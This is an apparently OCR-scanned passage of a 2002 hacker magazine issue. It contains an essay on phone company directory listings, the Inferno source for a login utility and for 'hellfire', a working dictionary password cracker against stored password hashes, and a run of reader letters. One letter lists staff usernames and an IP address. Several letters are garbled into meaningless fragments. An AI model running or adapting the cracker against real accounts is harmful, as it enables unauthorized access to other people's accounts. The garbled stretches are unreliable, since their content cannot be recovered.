referring to the LECs, or Local Exchange Carriers - those
phone companies that handle "the last mile" from the telco's
central office to your home. LEC's are broken up into ILEC's
and CLEC's (Incumbent Local Exchange Carriers and Competitive
Local Exchange Carriers). The "Incumbents" are the guys who
were around since before the breakup of AT&T, while the
"Competitives" are the new guys on the block who are supposed
to help keep the old guys "honest" and force them to keep
rates competitive. The guys who carry your conversations as a
long distance call are IXC's (IntereXchange Carriers).

As an old "phone phreak," it's almost embarrassing that I
should have to admit that my "day job" is that of a Directory
Assistance (DA) operator for a major Long Distance Carrier
(IXC). It doesn't matter which one because I don't really
work for them anyway. In these modern days of deregulation, I
work for a third-party outfit that is hired to provide the DA
service cheaper than they can do the job in-house. That's
because I live in one of the numerous "Right-To-Work" states
in the nation's sun-belt, and get paid pittance.

One of the major embarrassments of my job happens when
someone calls for the local phone company - not just in a
small town, but even in major cities! The phone company never
puts itself in the directory so it can be found! And of
course, I only handle White Pages. If the caller doesn't know
the name of the telco, I'm not allowed (by FCC tariff, I'm
told) to provide a "Yellow Pages" search. I keep threatening
to take some vacation time to visit the reading room of the
FCC in Washington some time and look this stuff up, but I
really can't afford the trip (see comment on "Right To Work"
state above).

Since I cover a number of states in my job, I get to look at
the listings of a number of major LEC's. Verizon will have
"Verizon Wireless" listings for every hamlet and burg in the
nation - but try to find a number for residential land-line
service that an out of state caller can ring up to see about
the problem with Aunt Minnie's account back home, and I'm up
against the tariff asking "Do you know the name of the phone
company in that area?" Even when I break down and suggest
that Verizon is the primary local carrier in Boston, or
Ameritech in Chicago (hoping that this isn't one of the calls
being "monitored for Quality Assurance"), just what number am
I supposed to supply? Deregulation began in 1986 with the
Modified Final Judgment. Here I am in the next century
wondering what I'm supposed to tell a customer who's on their
third call to Directory Assistance looking to get a phone
account squared away!

People call in with the most compelling stories about how
their elderly aunt back home in Chicago or Boston can't deal
with their phone company any more, and they need to call and
take care of the charges. Or somebody in the Rust Belt up
north is trying to reach the telco of their winter home in
the South to deal with a problem on their bill. It isn't that
I've got the time to stop and listen to their stories, it's
that I can't shut them up while trying to search the many
recurrences of the Directory Sales Office numbers while
trying to find a listing for an out of state caller to call.

The trick here is that the phone companies have all their
information about contacting them packed in the front pages
of their local telephone directories. In over 15 years of
deregulation, it hasn't occurred to most of them to advertise
in their own Yellow Pages under "Telephone Companies" or to
put in as big a listing in the White Pages as their Electric
Company utility brethren - the ones they keep passing in the
halls of the Public Service Commission offices but never need
to talk to. Keep in mind that the telephone book publishing
arm of those same phone companies have been "spun-off" so the
right hand really doesn't know what the left hand is doing -
because it isn't its own left hand any more!

Spring 2002

The other problem is when callers call out of state DA at
NPA-555-1212 (NPA is "Numbering Plan Area," the telcos'
in-house term for "Area Codes"), the White Pages listings are
never clear as to where an out-of-state caller should call
about discussing a bill. Actually, I should compliment
BellSouth here. They actually do have a specific number for
out-of-state callers to dial. Let me tell you why.

The number in most BellSouth states to reach the telco for
residential customers is 780-2355 (780-BELL). It's always a
local number wherever you call from, and if you live in an
area that has 10-digit dialing, you have to use your area
code in front of that number to get there. The number is
never good from out of state, but most of my "colleagues" in
the Call Center don't know this and give it out - causing
much frustration when the caller calls back to complain and
get a good number. It's a toll free number, and clearly
marked "out of state" but most callers don't want the "Toll
Free Number Runaround." They want a "direct number," then get
the recording that the number in the 780 exchange is not
valid.

So how does a telco go about changing the 
listings in the directory database that I (and my 
600 friends in my call center) use every day? Do 
what we tell people who call wondering why their 
number isn’t in our directory: "Call your Local 
Phone Company, and make sure they have your 
listing correct, Our information is updated from 
the information that they provide to us." 

So there it is. Get with it, you telcos! Get your act
together and pretend you're "just another American company."
Even you need to check your company's telephone book listings
once in a while. Make sure your customers can find you when
they call Directory Assistance, whether they're in town or
across the country - just like every other company has to.
Otherwise, your customers will go to that CLEC across town.
Usually, they can be found in the Phone Book!








Regrettably, we left out the source for two utilities that
went along with last issue's article on the Inferno operating
system. We apologize for the omission and include them below:


# clogon
# port of wm/logon to the command line
#
# by: dalai(dalai@swbt.net)
# http://www.swbt.net/~dalai

implement clogon;

include "sys.m";
    sys: Sys;
include "draw.m";
include "sh.m";
include "newns.m";

clogon: module
{
    init: fn(nil: ref Draw->Context, argv: list of string);
};

init(nil: ref Draw->Context, argv: list of string)
{
    sys = load Sys Sys->PATH;
    sys->print("clogon, by dalai(dalai@swbt.net)\n");

    sys->pctl(sys->FORKNS|sys->FORKFD, nil);

    # control file of this process, used below to kill the process group
    progdir := "#p/" + string sys->pctl(0, nil);
    kfd := sys->open(progdir+"/ctl", sys->OWRITE);
    if(kfd == nil) {
        sys->sprint("cannot open %s: %r", progdir+"/ctl");
        sys->raise("fail:bad prog dir");
    }

    # pick up the user name given with -u
    usr := "";
    if(argv != nil) {
        argv = tl argv;
        if(argv != nil && hd argv == "-u") {
            argv = tl argv;
            if(argv != nil) {
                usr = hd argv;
                argv = tl argv;
            }
        }
    }

    # logon() returns 1 on success and 0 on failure
    if (usr == nil || !logon(usr)) {
        sys->print("usage: clogon -u user\n");
    }

    # build the user's namespace if a namespace file is present
    (ok, nil) := sys->stat("namespace");
    if(ok >= 0) {
        ns := load Newns Newns->PATH;
        if(ns == nil)
            sys->print("failed to load namespace builder\n");
        else if ((nserr := ns->newns(nil, nil)) != nil) {
            sys->print("error in user namespace file: %s", nserr);
            sys->print("\n");
        }
    }

    sys->fprint(kfd, "killgrp");
    errch := chan of string;
    spawn exec(argv, errch);
    err := <-errch;
    if (err != nil) {
        sys->fprint(stderr(), "logon: %s\n", err);
        sys->raise("fail:exec failed");
    }
}

exec(argv: list of string, errch: chan of string)
{
    sys->pctl(sys->NEWFD, 0 :: 1 :: 2 :: nil);
    e := ref Sys->Exception;
    if (sys->rescue("fail:*", e) == Sys->EXCEPTION) {
        sys->rescued(Sys->ONCE, nil);
        exit;
    }

    # the two shell flags are barely legible in the scan; "-i" and "-n" assumed
    argv = "/dis/sh/sh.dis" :: "-i" :: "-n" :: nil;
    cmd := load Command hd argv;
    if (cmd == nil) {
        errch <-= sys->sprint("cannot load %s: %r", hd argv);
    } else {
        errch <-= nil;
        cmd->init(nil, argv);
    }
}

logon(user: string): int
{
    userdir := "/usr/" + user;
    if(sys->chdir(userdir) < 0) {
        sys->print("There is no home directory for that user mounted on this machine");
        return 0;
    }

    #
    # Set the user id
    #
    fd := sys->open("/dev/user", sys->OWRITE);
    if(fd == nil) {
        sys->print("failed to open /dev/user: %r\n");
        return 0;
    }
    b := array of byte user;
    if(sys->write(fd, b, len b) < 0) {
        sys->print("failed to write /dev/user with error: %r\n");
        return 0;
    }
    return 1;
}

stderr(): ref Sys->FD
{
    return sys->fildes(2);
}

# hellfire.b : /keydb/password decoder
#
# by: dalai(dalai@swbt.net)
# http://www.swbt.net/~dalai

implement hellfire;

include "sys.m";
    sys: Sys;
include "draw.m";
    draw: Draw;
include "bufio.m";
    bufio: Bufio;
    Iobuf: import bufio;
include "string.m";
    str: String;
include "arg.m";
    arg: Arg;
include "keyring.m";
    keyring: Keyring;
include "security.m";
    pass: Password;

hellfire: module
{
    init: fn(ctxt: ref Draw->Context, argv: list of string);
    usage: fn();
    finish: fn(temp: array of byte);
};

init(nil: ref Draw->Context, argv: list of string)
{
    sys = load Sys Sys->PATH;
    draw = load Draw Draw->PATH;
    bufio = load Bufio Bufio->PATH;
    str = load String String->PATH;
    arg = load Arg Arg->PATH;
    pass = load Password Password->PATH;
    keyring = load Keyring Keyring->PATH;

    sys->print("\nhellfire, by dalai(dalai@swbt.net)\n");
    sys->print("A Traumatized Production\n");

    if(argv == nil)
        usage();

    dfile := pfile := uid := "";
    arg->init(argv);

    # -d dictionary file, -u user id
    while((tmp := arg->opt()) != 0)
        case tmp {
        'd' => dfile = arg->arg();
        'u' => uid = arg->arg();
        * => usage();
        }

    if(dfile == nil || uid == nil)
        usage();

    dfd := bufio->open(dfile, bufio->OREAD);
    if(dfd == nil) {
        sys->print("Could not open %s.\n", dfile);
        exit;
    }

    # fetch the stored entry for this user
    pw := pass->get(uid);
    if(pw == nil) {
        sys->print("Could not get entry for %s.\n", uid);
        exit;
    }

    sys->print("Cracking...\n\n");

    pwbuff2 := array[keyring->SHAdlen] of byte;
    pwbuff := array[keyring->SHAdlen] of byte;

    # try some common passwords
    for(n := 1; n < 4; n++) {
        if(n == 1)
            pwbuff = array of byte "password";
        if(n == 2)
            pwbuff = array of byte uid;
        if(n == 3)
            pwbuff = array of byte "";

        keyring->sha(pwbuff, keyring->SHAdlen, pwbuff2, nil);

        temp1 := string pwbuff2;
        temp2 := string pw.pw;

        if(temp2 == temp1) {
            finish(pwbuff);
        }
    }

    # if not, try the dictionary
    for(dentry := "" ; ;) {
        dentry = dfd.gets('\n');
        if(dentry == nil)
            break;

        # strip the trailing newline
        if(dentry[len dentry-1] == '\n') {
            heh := "";
            (heh, nil) = str->splitl(dentry, "\n");
            dentry = heh;
        }

        pwbuff = array of byte dentry;
        keyring->sha(pwbuff, keyring->SHAdlen, pwbuff2, nil);

        temp1 := string pwbuff2;
        temp2 := string pw.pw;

        if(temp2 == temp1) {
            finish(pwbuff);
        }
    }

    sys->print("done.\n");
    sys->print("Have a nice day.\n");
    exit;
}

finish(pwbuff: array of byte)
{
    sys->print("Password is \"%s\"\n", string pwbuff);
    sys->print("Have a nice day.\n");
    exit;
}

usage()
{
    sys->print("usage: hellfire -d dictionary -u user\n");
    exit;
}

Signs of Hope

Dear 2600:

I have only just discovered your radio show last month and
have now downloaded most of this year's shows and also
subscribed to 2600. On the subject of DVD players, I work in
a major consumer electronics store here in Australia. In the
last 12 months all major DVD hardware manufacturers have
introduced not just region free but region selectable players
that bypass any advanced region encoding. It started with a
few unknown Asian brands. Then Pioneer, Philips, Samsung,
L-G, Panasonic, etc. all introduced these multi-region
players (most also have mp3 playback). The only major
manufacturer not to release a player of this type is Sony.
Some of the cheaper brands can even be Macrovision disabled.
This is a direct result of both government policy and
consumer power. Government competition policy says you can
sell any DVD player in this country (as you already know our
competition watchdog is looking very closely at the whole
region coding thing saying it may be used to artificially
inflate prices) and the consumers decided they wanted
multi-region.

The amazing thing is the response we have had in DVD release
times here. I was purchasing DVDs from the USA and Canada
last year because there was a three to six month delay in the
major release dates between our countries. The times are now
around a month or so for most major movies, so I wait for the
better quality PAL versions (sorry, but NTSC sucks).

At the moment we are at the beginning of having digital
television forced upon us by the media giants of the world,
but that's another story.

Breto

This is an excellent example of the importance of regulating
huge corporations by a government which represents the
people's wishes. Because our government and our corporations
are virtually one and the same, consumers simply don't have
the power they should have. If we ever succeed in pulling
them apart, we may have a chance. Thanks for the inspiration.


Dear 2600: 

I just got back from a major electronics store
known as "Fry's Electronics" and I got in some serious
trouble. I don't have my own transportation so I have
to ride the bus all around town. When I was in this
store, I pulled out my bus book to know what time the
next bus would come by. In doing this I had to open
my book bag that goes everywhere with me that had
some back issues of 2600 in it. Minutes later this guy
asked me to show him what was inside my bag (since
he saw me going through it). I told him sure, why not.
He opened my bag and behold - ten issues of 2600. He
said he was going to get security to escort me out. I
asked why. He said it was for hacking the store computers.
I told him it wasn't true and that all they had
were computers running winxp with no online access.
He claimed that he saw me doing it. I asked him if we
could go down to the tech bench to talk to someone
who knew what a hacker was. He agreed. We talked to
the department manager who said and I quote: "Please
leave the kid alone. There is no way he was doing anything
bad to the computers." About ten minutes later
the manager said, "So kid, how is the MPAA lawsuit
going, huh?"
avatar 
For cases that don't end so well, it's important to
know that in many places searching someone's bag in
this way is illegal and can open the establishment up
to legal action.


Higher Education


Dear 2600: 


I am in high school right now and on our school
computer there's a program installed that censors the
Internet. The program is "Gear H" and it's made by Internet
Content Management Software. I was wondering
if anyone knew anything about the program and
some possible loopholes in it.

ATth 


The word is out.


Dear 2600: 

Not myself being a person to exceed the bounds of
the law (I try to adhere to a strict moral code), I had a
brief skirmish with the authorities of my high school
which, thankfully, did not advance very far along the
disciplinary lines. I would like to know the opinion of
some other computer users.

The school runs Novell Netware and (idiotically)
did not turn off the feature that allows users to send
messages to each other. During a typing class I was
forced to take, my fingers roamed across the keyboard
and I began to look around the system. I realized that
the system was allowing me to modify anything and
that I could send messages to another user. After
school, at a later date, I sent a message to another
classmate in another room. A classmate next to me
alerted the librarian that I was "using the computer for
bad stuff." The librarian became red in the face and
pulled me to the principal's office. She informed the
principal that I was crashing the network. I found this
to be a ludicrous charge against me but didn't contest
it, seeing as how it would upset the situation. I got off
with absolutely no penalty except that all the computer
teachers will be looking over my shoulder from now
on. My question is whether or not sending a message
to another user is a great offense.
StMike 
The great offense is doing something that the people
in charge didn't understand. Unfortunately, in most
high schools, that applies to almost anything that happens
after the power is turned on.







ha Kin such a bad way it
uneer for the information
guys at ion point me in the right direction?
way, you guys rock!

Mingus 

We get about a dozen of these letters every day, so
consider yourself honored that yours was selected
completely at random. There are a couple of things
that have to be understood. First, relatively few people
are hackers, even though quite a few either want to be
or walk around saying they are. Most of what constitutes
hacking is the whole process of figuring things
out. While we can offer tips and suggestions on specific
applications of technology, we cannot tell you
how to think. That's something you either develop on
your own or not. If you keep an open mind and don't
shy away from activities which most would view as a
complete waste of time, you're off to a good start.
Learning a little history is always a wise move - there
are plenty of online resources in addition to our magazine
which document the milestones of our community.


Dear 2600:
Hey I need some help on finding some credit card


and pin num so if you ca e 
and p bers you Y 


you a favor so hook me up. 








ss, 


EN ‘Asbigussen@ndlcom 

Consider yourself hooked up. We get hundreds of
these requests every week. Most are a result of
some big media expose on hackers. In a way, the
media seems to be creating these people - they go on
the air and print stories saying that hackers go around
stealing things and then the people who go around
stealing things see this and start calling themselves
hackers. Perhaps we should come up with some choice
definitions of media so that everyone equates them
with liars.


Dear 2600:

I think my girlfriend has been cheating on me and I
wanted to know if I could get her password to Hotmail
and AOL. I am so desperate to find out. Any help
would be appreciated. Thanks.










HSFk2 

And this is yet another popular category of letter
we get. You say any help would be appreciated? Let's
find out if that's true. Do you think someone who is
cheating on you might also be capable of having a
mailbox you don't know about? Do you think that even
if you could get into the mailbox she uses that she
would be discussing her deception there, especially if
we live in a world where Hotmail and AOL passwords
are so easily obtained? Finally, would you feel better if
you invaded her privacy and found out that she was
being totally honest with you? Whatever problems are
going on in this relationship are not going to be solved
with subterfuge. If you can't communicate openly,
there's not much there to salvage.


Corrupting Youth 


Dear 2600: 

I just want to start by saying that I totally agree
with the first sentence of JohnG54429's letter in your
issue. It is great, what you're doing for today's
youth. All that I've seen you print in your magazine is
and if it causes more American youth (like
myself) "to lose morale for this great country," then so
be it. At least they won't have blind loyalty to a country
without knowing the truth. And maybe once more
people realize this, we can all help to change the government
so it will once again be something we can be
proud of.
ex_chronos
Miscellaneous Info 
Just a heads up that the final build of Windows XP
version 5.1.2600 (coincidence?) default
install doesn't have any firewall protection enabled.
People will have access to such services as smtp,
p and netbios services. To enable your firewall check
the box "Protect my computer with firewall" in the advanced
tab under the Connection Properties dialog
box. I can't believe Microsoft didn't inform the user
about this option as the average computer user has no
worries about Internet security.

Also, the investigation of Enron will be done with 
a program called EnCase. This computer forensics 
program enables someone to view data after it is 
deleted from the most popular operating systems currently
in use. The web site
http://www.guidancesoftware.com/html/index.html allows you to request a
demo disk. Don't spoil it for everyone by ordering 
20,000 of them overnight! If you know of anyone who 
has the full version of this, declare them your best 
friend and see if they'll burn ya a copy because it'll 
cost ya $2,500! 
~dissoluten 


Dear 2600: 
Please check out these important sources of critical 
information! 
http://projectcensored.org
http://www.copvcia.com
http://www.indymedia.org
http://disclosureproject.org 
Empty Set 


Dear 2600: 
When I first was interested in programming, I didn't
want to invest any money before I knew for sure
what it was all about. I was saved by a great language
called Python. | can interpreter: 


executes the so we line at a time instead of turf; 
ing it into machin sua pe yu ond Alst pecto 


ented, a near necessity, 
perhaps the most t appealie 
their sone "Pass tA ALONE


is free! The syntax of Python is remarkably clear, yet it 
stays powerful and competitive. It has plenty of docu- 
mentation all over the web and is a great language for 
beginners and experts alike. 

The article isn't much but in my opinion Python 
deserves a whole lot more respect. Feel free to edit and 
add on to this article, I just want a free t-shirt or 2600 
e-mail. 

Raleigh Cross 

It's rather clear that’s what you want. It's time once 
again to clarify our policy. Letters are not articles! 
And articles should not be written for the sole purpose
of getting free stuff. It's screamingly obvious when they 
are. 


Dear 2600: 
I am writing in response to dmitry kostyuk’s letter
in your 18:4 issue. He was asking for a program to 
convert Microsoft Word files into HTML files. Mi- 
crosoft Word can save as an HTML file. To do this go 
to File-Save As. Click on the pull down menu labeled 
"Save as Type", select HTML. Type in a file name and 
hit Save. Also, I have not seen the specs on Microsoft's 
doc format. However, it is used outside of Microsoft.
Sun Microsystems makes a free program called Star 
Office which is capable of using Word files. Hope this 
helps. 
Revanant 


Dear 2600:

I just got my copy of 18:4 and was pleasantly surprised
to see the letter by "No Name" on the @home
Matrix. I agree, the information he's given out is not
much to hide one's name or handle over. The Matrix
does not, in fact, allow you to access someone's computer
directly. The Matrix works in a tier system. The
higher the tier, the more access you have.

Some of the higher tier accessing staff never bothered
to log out afterwards. They were: matrix-users,
majordomo, Matnix-Trouble, anita johsnton, agentile, 
bart_connors, bmartone, brutkowski, clowery, DHen- 
nie, Farrell Moseley, fschmidt, happlegate, jbrennan, 
jsapienza, jtreece, Irobinson, rsimmons, rsullivan, 
shill, 3177264581, twright, and jgrove. 

The Matrix was located at 24.253.207.77, but un- 
fortunately it was taken down permanently as of Feb- 
ruary 28th, 2002. However, the greatness of this 
system should not be forgotten and any who wish to 
learn more about it may wish to go to 
hip main. home.netidoc/Matrix6,pdat and read their 
Matrix User's Guide. 

Doodle 

Unfortunately with the demise of @home, this address
is no longer valid. If we find a mirror, we'll pass
it along. 


Dear 2600: 

You may or may not already know this but I
haven't seen it in your magazine or elsewhere. The
British anarchist band Chumbawamba put a remix of
their song "Pass It Along" on their web page a while
ago. It features sound clips from Metallica, Dr. Dre,
and Eminem, all apparently without permission. Better
yet, it has excerpts from Jello Biafra's H2K keynote
speech. You can download the song and read their
press release concerning it at:
http://www.chumba.com/_passitalong.htm.

On a side note, General Motors bought the rights 
to use this same song (the album version, not the 
remix) in their recent Pontiac commercials. Appar- 
ently, Chumbawamba turned around and donated half 
of that money to CorpWatch, who plans on using the 
money to document the "social and environmental im- 
pacts of GM itself.” The other half went to Indy Media. 
Chumbawamba has a very interesting political past. 
Among other things, a member once dumped a bucket 
of water on Great Britain's Deputy Prime Minister 
John Prescott for his handling of a dockworkers’ 
strike. It's good to know that a (relatively) mainstream
band is this politically conscious. 

I love your magazine and hope you can prevail in 
your sia i yapa future endeavors. Good luck to you. 

ura J ubatus 


pa Ey Needed ( 


Dear 2600:
I am just curious to know if your magazine has a
minimum/maximum length for article
submissions. Let me know.


Rick Olson 

aka Fluffy 

As indicated above, something extraordinarily
short will probably be looked at as a letter. Articles
should be as in-depth as possible without being overly
wordy. Since we wind up editing anyway, it's best to
give us as much info as you can rather than too little.
So there are no formal requirements either way - just
go with your instincts.


Dear 2600:

I may excuse you because of the September 11th 
terrorist attacks but I sent you four photographs of 
payphones (by mail) and I don't have my free subscription.
I also sent an e-mail to letters@2600.com
and the only thing I got was an automated answer.
"Thank you blablabla...." Maybe sending to all of your 
addresses may work. Thank you for being so commu- 
nicative. 

Johnny 

First off, we have always been way too busy to re- 
spond to each and every piece of mail we get. Most 
people and certainly most magazines simply cannot do 
this. Second, we're quite clear on our web page that 
you will get a free subscription if your payphone photos
are printed. You seem to think that just by sending
us photos you qualify. That's not how it works. Third, 
the automated answer you got from the letters e-mail 
address explains that personal replies aren't possible. 
Why you then chose to enter into an extended dialogue
with an automated reply function is something people 
who do have time on their hands may choose to pon- 
der. Finally, all you succeed in doing by flooding us 
with annoying mail is to be labeled as someone worthy 
of being ignored altogether. 


Dear 2600: 

When exactly do you plan on releasing Freedom
Downtime? It's been about a year already since it was
completed. You could at least release it on VHS; the
medium really doesn't matter.
haux 

We've wanted to release it more than anyone has
wanted to see it so we understand the frustration. We
needed to make sure we covered the legal bases with
regards to the music we used since suing us has become
corporate America's latest sport. But we're
happy to say that these hurdles are behind us and you
should find ordering info in this issue and on our website.
For now it's in VHS format. We expect to have a
DVD version sometime in the future.


Dear 2600: 

I would like to contribute some money to the
DeCSS appeal legal defense fund. Please let me know
how to do so.

Bill Boyle 

The Electronic Frontier Foundation covered the
legal expenses for that case. You can donate to them at
www.eff.org or by writing to EFF, 454 Shotwell Street,
San Francisco, CA 94110-1914.


Dear 2600: 

I attend a meeting of security administrators at my
office every other month. In your recent issue, there
are two articles that I would like to photocopy and give
out at this meeting to give other attendees a better understanding
of what information is readily available to
people trying to break into systems and why you must
keep patches current and lock down the server. What
would be the proper way to get permission from you to 
copy these articles and give them out in the meeting? 

Anti-Christ 

It's amazing to us that people actually think they
have to do this. This constitutes personal use - you
have every right to use excerpts of a publication in 
such a manner without asking permission. 


Dear 2600: 

My father passed away last year. Unfortunately he 
used my name and social security number in the past. 
Now I don't have a good credit report and I need help.
Can you help me? I am the father of two baby girls and
I would like to buy a house one day.

lop 

Assuming you don't want to continue the family
tradition and simply use your kids' SSNs, you need to
clear your name. You seem to be under the impression
that hackers go around wiping people's credit reports
or creating new identities. Of the relatively few who do
know how to easily do such things, hardly any would
ever do it for hire. And we don't talk to them.

So the first step is for you to stop acting like you're
guilty of a crime. Unless you are. (We still won't be
able to help you but we'd at least respect your honesty.)
If it happened the way you said it did, there are
ways of dealing with it. Check with the Social Security
Administration and the various credit bureaus and tell
us what they say. If you're forthcoming with them and
don't do anything stupid like ask people to help you get
fake credit, you at least have a chance of setting things 
right. And even if that doesn't work, there are other 
channels which can give you a voice. 


Dear 2600: 
I've been reading 2600 for, well, most years I
could read and comprehend what was written on the
pages of 2600. It comes time now that I have a band
and we have been ripping our brains out for names to
call ourselves and finally I suggested "2600." My only
questions are: Is this legal? Is this okay with the writers/editors
of my favorite zine? I know 2600 is only a
degree of megahertz used in phreaking, but it is a name
trademarked by you. Is this all right?
Drew 

It’s hertz, not megahertz. While it's a very nice 
thought, we wouldn't be entirely comfortable with a 
band going around with that name. What would hap- 
pen if you became really big and your music started to 
suck? People would forever associate the name 
"2600" with corporate rock and we'd probably wind 
up getting sued by the giant record company that 
signed you. Imagine the irony. But seriously, we have 
no say in this. You can call yourself whatever you
want. We'd be happier, though, if it were a reference of
some sort rather than the entire name. After all, there's
always the chance that we're going to quit this publishing
thing and turn into musicians one day.


Dear 2600: 

While flipping through my recently purchased 
18:4 I noticed something odd. Some of the pages were 
blank! How ever will I build my wooden computer
since pages 22-23 are missing? How will I know the
outcome of the "Right Click Suppression" article without
page 19? I will not be able to "Harness the Airwaves"
as page 26 was also blank. In addition, 35, 35,
39, and 42 were also blank. I hope this is just a case of
a misprinting and not a larger conspiracy by someone
to keep the information from reaching the masses. If it
was indeed just a misprinting, could the pages listed be
sent or posted somewhere so that we could read the
rest of the articles that were to have been printed on
these pages? 

SuperGuido 

If you have such a printing defect in this or any issue,
send it in to us and we'll not only send you a replacement,
but an extra issue as well for your trouble.


Dear 2600: 

Just curious - do you have information stored away
in random pictures on 2600.com? Stegdetect reported
that a few jpegs from your site have information stored
with jphide. However I have been unable to crack
them to determine if this is true.... 

Crim 


Dear 2600: 

At my law studies class this morning, we had a 
guest speaker. It was a Secret Service agent. He
popped in a tape that explained to us what the Secret
Service was and why we wanted to be in it. In a couple
of scenes, they showed either your website or magazine.
I can't remember what the cover was though, so I
don't know how old it was. Anyway, the video was
talking about how the SS is very knowledgeable on 
technological forms of theft, fraud, and hacking and 
how! their agents ate, hoi trained*in investigating 


an ti 
cnt | pulling pup your web 
keyboard. Just thought you'd like to know. Don't they
have to ask permission for that or something? 

Kaoslord 

Ft Lauderdale, FL 

We're not concerned about our covers being used
so much as we're concerned over the context. If
they're implying by their use that we're involved in
criminal activity then we have something to talk to
them about. We've been hearing about this video for
sometime now - hopefully one day someone can get us





The meetings for Orange County are a joke. It's 
like a bunch of kids in a pissing contest. These people
are making 2600 look sorry. 

john smith 

Let's be clear about our meetings and the relation- 
ship between them and the magazine. Our affiliation is 
a very loose one but we do consider the meetings to be
representative of what the magazine stands for. That's
why we have a set of guidelines (available in the meetings
section of our web pages or by e-mailing
meetings@2600.com) which spell out what's acceptable
and what isn't. For example, our meetings are open to
the world. That means inevitably people who don't really
believe in what we stand for will show up. We cannot
prevent this. Usually there are multiple sections at
any single meeting - their only common point being the
meeting guidelines. It's important to remember that no
one group of people "runs" any meeting. Therefore, to
define it as you have means that either you're paying
attention to the wrong people or the meeting has in
fact been subverted by idiots who don't respect our
guidelines. The latter has happened in the past and 
probably will in the future. When we find out (and we 
most always do), our name comes off it and it becomes 
just an anonymous group of idiots in a mall on a Fri- 
day night. 


Dear 2600: 

To the “hacker” who was on Cool FM 98.5 (in 
Montreal) on 02/11/02: shut the fuck up! Thanks for 
telling everyone that hackers are nothing but simple 
thieves. I hope you die in horrible pain!

tHri3z3 

There's nothing like an intelligent counterpoint to
prove a point.


Dear 2600: 

I am sick of it. I am sick of being labeled a criminal.
I am tired of being branded as a menace to society
and a threat to order. I was flipping through the TV
channels and I started watching some movie. It was
like Max Something Super Spy, but anyways all it was
was some anti-hacker propaganda crap that Hollywood
churned out. I am so tired of it. We are
constantly-Selaganashed because we are hackers. I hate the

reptionsvof us. If you are a hacker that 

ineatis ¿all ¿yo dol ¿bredk into people's e-mail ac- 
counts aid write WT "Even looking at the dictio- 
nary iš pe irae gays a hacker is "a talented 
amateur of computers, specifically one who attempts
to gain unauthorized access to files in various
systems." That is just not true. Hackers aren't evil, we
are really good people. But everyone hates us. Why?
Because we get the fallout from people who write
viruses and stuff like that, that's why. Because so and
so wrote a virus and the media said he was a hacker,
that means all of you hackers are evil. We get pinned
with the blame. It's getting so bad that if you say the 
word hack people sorta cringe, like when you say mur- 
der E But if you try and hide the fact that 
a ha 


| Er € ES YO E Eat You let the media 
Sey] tee i | i N Ñ e ia ae 1. ‘ 5 
O E A an pos pho youl are. So be proud to be 
fe aT i pal Me Hn E f Y and j t you aie 
ian iF i $ Binary Burnout 


(Not La hakina | IS a tristie vio but the U.S. 
Patriot Act of 2001 says it is!) 


Mr. Brown 

Our biggest comfort in that regard is that we don't
have a whole lot of assets in the first place. Actually,
that's probably not very comforting at all.


Dear 2600: 

Here is something I thought everyone might find in-
teresting to think about. A few days ago I received a 
code from a person asking me to crack it. A few days 
later I did and sent him the decrypted message to prove 
that I had done it. The reason he claimed for sending it 
involved a huge "worldwide underground hacking
group." While he seemed to give the feeling that this
was something of a rather "elite" group, he mentioned
no specifics about it. After sending him the decrypted 
code he proceeded to tell me that he worked for a gov- 
ernment agency in Australia called the ASIO (Aus- 
tralian Security Intelligence Organization) and that 
they were looking for people who could do things like 
crack codes, hack, and so on. After hearing this I had 
no desire to continue communication with this person 
but here is the interesting part. The second step for 
"joining" was to crack a harder code using a program. 
Easy, right? Yes, but here is the catch. After doing so 
they will hack the computer that you used to download 
the program to look at your hard drive. So basically 
they are looking for hackers and cyberterrorists but at 
the same time are recruiting hackers. Anyway, once 
they have hacked your computer (and this is govern- 
ment!!!), they will use your computer as their personal 
proxy. So if they are tracing a cyberterrorist and the 
cyberterrorist is smart enough to figure out he is being
traced, he will send a trace back. At this point it would 
lead to the ASIO’s "proxy," in this case my computer. 
So let's think about this. Now it looks like my com- 
puter is tracing them and the cyberterrorists go after 
this computer. Why would anyone in his or her right 
mind let this happen? Hope this gives everyone some- 
thing to think about. 
3-Com 
Oh it does. Like perhaps you've confused your 
computer with your TV set.




2600 Magazine 











Dear 2600: 

As if Carnivore wasn’t bad enough, now we have 
the government stealing our encryption keys to read 
the encrypted files that we have every right to keep private.
This software known as "Magic Lantern" apparently
installs a key logger on a target computer to grab
the pass phrase used when pgp loads. Our individual 
rights are continually being violated by this “Cyber 
Knight” project that encompasses Carnivore and 
Magic Lantern. You gotta wonder what else they have 
up their sleeve. I say we hold public protests. More 
people need to be informed about this. 


silent 

In addition, when someone finally finds this thing
on their system, let us know so we can print an article
on how to detect it. In fact, we suspect there are people
actively trying to get it for just such a purpose.





which would not only Se hat pda telemarketers
but because of the disconnection their software
removes you from their database. I looked into
the device and what it does is send out a tone (disconnect
pulse) to their switching equipment. Rather than
spend $49 to buy this device, I had the idea of using
my modem and sound card to generate the signal, so
all you need is a bit of software and cable. Once I get
this working and if no one has done this before, would 
you be interested in an article? 
Drwar 
We'd certainly like to know more. We know of no
such "disconnect pulse" that could be used to get rid of
anyone, let alone telemarketers. About the only thing
we can imagine is that this device plays the three tones
commonly heard before an intercept recording which
might make their auto-dialers assume it's not a valid
number. It's little more than wishful thinking that this
means the number would be purged from the database.
This could result in other calls being lost as well. But
most importantly, paying 50 bucks to have these tones
played would be a bit of a scam, to say the least. We
find a better service (assuming you don't want to pick
up any calls that don't display caller ID) is offered by
many local phone companies at a fraction of the cost.
Callers who don't transmit caller ID are prompted to
say their names. The called party's phone then rings
with that person's name and they can either accept the
call at that point or reject it (or completely ignore it).
Telemarketers who don't identify themselves never 
even ring egaa 
Dear 2600:

I am a long time newsstand buyer of your magazine,
which I've always found to be highly informative
in its articles, while the letters of a political bent tend

Spring 2002

you seem to suffer from a similar naivete as your readers
when it comes to other technologies, like guns.
Firearms are simply a technology, like any red box,
laptop, modem, network card, Captain Crunch Ring,
or computer programming language. They, like any
technology, can be used to enhance or detract from individual
liberty depending on the user, their intentions,
and their actions. Thus, like any technology, firearms
are morally neutral, inanimate objects. Just as a hacker
could potentially ruin the life of any individual or
group of individuals in the world via identity theft or
other malicious abuses, any person possessing a
firearm can similarly potentially ruin the lives of others.
It is the actual actions of the individual wielding
technology that determines actual results, as you have
so rightly stated so many times in the past with regards
to various computer technologies. You should be at
least as consistent when it comes to other technologies,
like guns, as well.
Mike 'retroman' Lorrey
We've always advocated the responsible use of any
tool or technology and that it's the user of these who
bears ultimate responsibility for their use/misuse. We
